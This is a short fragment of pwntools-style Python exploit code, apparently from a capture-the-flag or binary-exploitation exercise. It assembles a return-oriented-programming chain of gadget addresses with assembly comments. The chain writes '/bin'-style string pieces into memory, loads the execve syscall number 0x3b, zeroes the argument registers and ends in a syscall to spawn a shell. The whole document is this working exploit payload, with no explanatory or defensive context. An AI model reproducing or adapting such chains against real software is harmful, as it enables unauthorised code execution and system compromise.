payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x6e69622f)+p64(0x41b707)
# 0x000000000041b707: pop rax; ret; 
payload += p64(0x4c51ff)+p64(0x46a668)
# 0x000000000046a668: mov ecx, edi; dec dword ptr [rax - 0x7d]; ret; 
payload += p64(0x41b707)
# 0x000000000041b707: pop rax; ret; 
payload += p64(0x4c50ed)+p64(0x4050b5)
# 0x00000000004050b5: add dword ptr [rax - 0x7d], ecx; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x68662f)+p64(0x41b707)
# 0x000000000041b707: pop rax; ret; 
payload += p64(0x4c5268)+p64(0x46a668)
# 0x000000000046a668: mov ecx, edi; dec dword ptr [rax - 0x7d]; ret; 
payload += p64(0x41b707)
# 0x000000000041b707: pop rax; ret; 
payload += p64(0x4c50f1)+p64(0x4050b5)
# 0x00000000004050b5: add dword ptr [rax - 0x7d], ecx; ret; 
payload += p64(0x41b707)
# 0x000000000041b707: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4c5070)+p64(0x44f495)
# 0x000000000044f495: pop rdx; ret; 
payload += p64(0x0)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4526b5)
# 0x00000000004526b5: syscall; 
payload += b''
